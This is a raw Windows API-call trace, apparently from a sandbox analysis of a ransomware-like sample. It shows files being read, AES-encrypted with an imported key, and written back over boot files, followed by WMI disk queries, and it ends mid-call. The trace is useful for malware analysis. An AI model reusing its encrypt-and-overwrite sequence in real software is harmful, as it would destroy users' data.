[0202.057] GetFileSize (in: hFile=0x5a4, lpFileSizeHigh=0x689f580 | out: lpFileSizeHigh=0x689f580*=0x0) returned 0x16640 [0202.057] ReadFile (in: hFile=0x5a4, lpBuffer=0x2ee31b38, nNumberOfBytesToRead=0x16640, lpNumberOfBytesRead=0x689f52c, lpOverlapped=0x0 | out: lpBuffer=0x2ee31b38*, lpNumberOfBytesRead=0x689f52c*=0x16640, lpOverlapped=0x0) returned 1 [0202.073] CloseHandle (hObject=0x5a4) returned 1 [0202.073] CryptAcquireContextW (in: phProv=0x689f4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f4cc*=0x7a94a8) returned 1 [0202.074] CryptGenRandom (in: hProv=0x7a94a8, dwLen=0x10, pbBuffer=0x353bcf8 | out: pbBuffer=0x353bcf8) returned 1 [0202.703] CryptImportKey (in: hProv=0x7a94a8, pbData=0x34b5e74, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f49c | out: phKey=0x689f49c*=0x77b070) returned 1 [0202.703] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.704] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.704] CryptDuplicateKey (in: hKey=0x77b070, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f48c | out: phKey=0x689f48c*=0x77b130) returned 1 [0202.704] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.704] CryptSetKeyParam (hKey=0x77b130, dwParam=0x4, pbData=0x34b5f54*=0x1, dwFlags=0x0) returned 1 [0202.704] CryptSetKeyParam (hKey=0x77b130, dwParam=0x1, pbData=0x34b5f20, dwFlags=0x0) returned 1 [0202.705] CryptEncrypt (in: hKey=0x77b130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f145178*, pdwDataLen=0x689f4f8*=0x16650, dwBufLen=0x16650 | out: pbData=0x2f145178*, pdwDataLen=0x689f4f8*=0x16650) returned 1 [0202.706] CryptEncrypt (in: hKey=0x77b130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b5f7c*, pdwDataLen=0x689f500*=0x0, dwBufLen=0x10 | out: pbData=0x34b5f7c*, pdwDataLen=0x689f500*=0x10) returned 1 [0202.710] CryptDestroyKey (hKey=0x77b070) returned 1 [0202.710] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0202.710] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0202.710] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0202.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f464) returned 1 [0202.710] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0202.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2a0) returned 1 [0202.712] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0202.712] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0202.712] CoTaskMemFree (pv=0x9831858) [0202.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689ef58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.712] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4a0 | out: ppv=0x689f4a0*=0x72015c) returned 0x0 [0202.712] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f498 | out: pAptType=0x689f498*=1) returned 0x0 [0202.712] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f49c | out: ppvObject=0x689f49c*=0x0) returned 0x80004002 [0202.712] IUnknown:Release (This=0x72015c) returned 0x1 [0202.713] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee08 | out: ppv=0x689ee08*=0x6736e48) returned 0x0 [0202.713] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f020 | out: ppvObject=0x689f020*=0x0) returned 0x80004002 [0202.713] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f034 | out: ppvObject=0x689f034*=0x6738930) returned 0x0 [0202.713] WbemDefPath:IUnknown:Release (This=0x6736e48) returned 0x0 [0202.713] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec54 | out: ppvObject=0x689ec54*=0x6738930) returned 0x0 [0202.714] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec10 | out: ppvObject=0x689ec10*=0x0) returned 0x80004002 [0202.714] WbemDefPath:IUnknown:AddRef (This=0x6738930) returned 0x3 [0202.714] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0202.714] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e51c | out: ppvObject=0x689e51c*=0x0) returned 0x80004002 [0202.714] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e528 | out: ppvObject=0x689e528*=0x9820eb8) returned 0x0 [0202.714] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820eb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e530 | out: pCid=0x689e530*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.714] WbemDefPath:IUnknown:Release (This=0x9820eb8) returned 0x3 [0202.714] CoGetContextToken (in: pToken=0x689e588 | out: pToken=0x689e588) returned 0x0 [0202.714] CoGetContextToken (in: pToken=0x689e538 | out: pToken=0x689e538) returned 0x0 [0202.714] CoGetContextToken (in: pToken=0x689e990 | out: pToken=0x689e990) returned 0x0 [0202.714] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea20 | out: ppvObject=0x689ea20*=0x0) returned 0x80004002 [0202.714] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x2 [0202.714] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x1 [0202.714] CoGetContextToken (in: pToken=0x689f318 | out: pToken=0x689f318) returned 0x0 [0202.714] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0202.714] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738930, riid=0x689f348*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f344 | out: ppvObject=0x689f344*=0x6738930) returned 0x0 [0202.714] WbemDefPath:IUnknown:AddRef (This=0x6738930) returned 0x3 [0202.714] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x2 [0202.714] WbemDefPath:IWbemPath:SetText (This=0x6738930, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.714] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0202.714] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x689f4c8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c8*=0x20, pszText=0x0) returned 0x0 [0202.714] WbemDefPath:IWbemPath:GetText (in: This=0x6738930, lFlags=2, puBuffLength=0x689f4c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738930, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738930, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738930, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738930, puCount=0x689f44c | out: puCount=0x689f44c*=0x0) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f438 | out: puCount=0x689f438*=0x2) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0x0, pszText=0x0 | out: puBuffLength=0x689f434*=0xf, pszText=0x0) returned 0x0 [0202.715] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f434*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.715] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f3e8 | out: ppv=0x689f3e8*=0x72015c) returned 0x0 [0202.715] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f3e0 | out: pAptType=0x689f3e0*=1) returned 0x0 [0202.715] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f3e4 | out: ppvObject=0x689f3e4*=0x0) returned 0x80004002 [0202.715] IUnknown:Release (This=0x72015c) returned 0x1 [0202.716] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ed50 | out: ppv=0x689ed50*=0x6736e28) returned 0x0 [0202.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ef68 | out: ppvObject=0x689ef68*=0x0) returned 0x80004002 [0202.716] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ef7c | out: ppvObject=0x689ef7c*=0x67389a0) returned 0x0 [0202.716] WbemDefPath:IUnknown:Release (This=0x6736e28) returned 0x0 [0202.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eb9c | out: ppvObject=0x689eb9c*=0x67389a0) returned 0x0 [0202.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eb58 | out: ppvObject=0x689eb58*=0x0) returned 0x80004002 [0202.716] WbemDefPath:IUnknown:AddRef (This=0x67389a0) returned 0x3 [0202.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0202.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e464 | out: ppvObject=0x689e464*=0x0) returned 0x80004002 [0202.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e470 | out: ppvObject=0x689e470*=0x9820ed8) returned 0x0 [0202.717] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820ed8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e478 | out: pCid=0x689e478*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.717] WbemDefPath:IUnknown:Release (This=0x9820ed8) returned 0x3 [0202.717] CoGetContextToken (in: pToken=0x689e4d0 | out: pToken=0x689e4d0) returned 0x0 [0202.717] CoGetContextToken (in: pToken=0x689e480 | out: pToken=0x689e480) returned 0x0 [0202.717] CoGetContextToken (in: pToken=0x689e8d8 | out: pToken=0x689e8d8) returned 0x0 [0202.717] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e968 | out: ppvObject=0x689e968*=0x0) returned 0x80004002 [0202.717] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x2 [0202.717] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x1 [0202.717] CoGetContextToken (in: pToken=0x689f260 | out: pToken=0x689f260) returned 0x0 [0202.717] CoGetContextToken (in: pToken=0x689f1c0 | out: pToken=0x689f1c0) returned 0x0 [0202.717] WbemDefPath:IUnknown:QueryInterface (in: This=0x67389a0, riid=0x689f290*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f28c | out: ppvObject=0x689f28c*=0x67389a0) returned 0x0 [0202.717] WbemDefPath:IUnknown:AddRef (This=0x67389a0) returned 0x3 [0202.717] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x2 [0202.717] WbemDefPath:IWbemPath:SetText (This=0x67389a0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0202.717] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67389a0, puCount=0x689f410 | out: puCount=0x689f410*=0x2) returned 0x0 [0202.717] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x689f40c*=0x0, pszText=0x0 | out: puBuffLength=0x689f40c*=0xf, pszText=0x0) returned 0x0 [0202.717] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=4, puBuffLength=0x689f40c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f40c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.717] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f410 | out: ppv=0x689f410*=0x72015c) returned 0x0 [0202.718] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f408 | out: pAptType=0x689f408*=1) returned 0x0 [0202.718] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f40c | out: ppvObject=0x689f40c*=0x0) returned 0x80004002 [0202.718] IUnknown:Release (This=0x72015c) returned 0x1 [0203.033] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f030 | out: ppv=0x689f030*=0x673cfa0) returned 0x0 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x673cfa0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f248 | out: ppvObject=0x689f248*=0x0) returned 0x80004002 [0203.034] WbemLocator:IClassFactory:CreateInstance (in: This=0x673cfa0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f25c | out: ppvObject=0x689f25c*=0x6736ee8) returned 0x0 [0203.034] WbemLocator:IUnknown:Release (This=0x673cfa0) returned 0x0 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee7c | out: ppvObject=0x689ee7c*=0x6736ee8) returned 0x0 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee38 | out: ppvObject=0x689ee38*=0x0) returned 0x80004002 [0203.034] WbemLocator:IUnknown:AddRef (This=0x6736ee8) returned 0x3 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e744 | out: ppvObject=0x689e744*=0x0) returned 0x80004002 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e750 | out: ppvObject=0x689e750*=0x0) returned 0x80004002 [0203.034] CoGetContextToken (in: pToken=0x689e7b0 | out: pToken=0x689e7b0) returned 0x0 [0203.034] CoGetContextToken (in: pToken=0x689e760 | out: pToken=0x689e760) returned 0x0 [0203.034] CoGetContextToken (in: pToken=0x689ebb8 | out: pToken=0x689ebb8) returned 0x0 [0203.034] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec48 | out: ppvObject=0x689ec48*=0x0) returned 0x80004002 [0203.034] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x2 [0203.034] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x1 [0203.034] CoGetContextToken (in: pToken=0x689f228 | out: pToken=0x689f228) returned 0x0 [0203.034] CoGetContextToken (in: pToken=0x689f188 | out: pToken=0x689f188) returned 0x0 [0203.035] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x689f258*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f254 | out: ppvObject=0x689f254*=0x6736ee8) returned 0x0 [0203.035] WbemLocator:IUnknown:AddRef (This=0x6736ee8) returned 0x3 [0203.035] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x2 [0203.035] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67389a0, puCount=0x689f3ec | out: puCount=0x689f3ec*=0x2) returned 0x0 [0203.035] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=8, puBuffLength=0x689f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x689f3e8*=0xf, pszText=0x0) returned 0x0 [0203.035] WbemDefPath:IWbemPath:GetText (in: This=0x67389a0, lFlags=8, puBuffLength=0x689f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.035] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f2c4 | out: ppv=0x689f2c4*=0x6736ec8) returned 0x0 [0203.035] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736ec8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f358 | out: ppNamespace=0x689f358*=0x6748264) returned 0x0 [0204.068] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1f4 | out: ppvObject=0x689f1f4*=0x781ae4) returned 0x0 [0204.068] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ae4, pProxy=0x6748264, pAuthnSvc=0x689f244, pAuthzSvc=0x689f240, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c, pImpLevel=0x689f22c, pAuthInfo=0x689f230, pCapabilites=0x689f234 | out: pAuthnSvc=0x689f244*=0xa, pAuthzSvc=0x689f240*=0x0, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c*=0x6, pImpLevel=0x689f22c*=0x2, pAuthInfo=0x689f230, pCapabilites=0x689f234*=0x1) returned 0x0 [0204.068] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x1 [0204.068] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e8 | out: ppvObject=0x689f1e8*=0x781b04) returned 0x0 [0204.068] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e4 | out: ppvObject=0x689f1e4*=0x781ae4) returned 0x0 [0204.068] WbemLocator:IClientSecurity:SetBlanket (This=0x781ae4, pProxy=0x6748264, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, 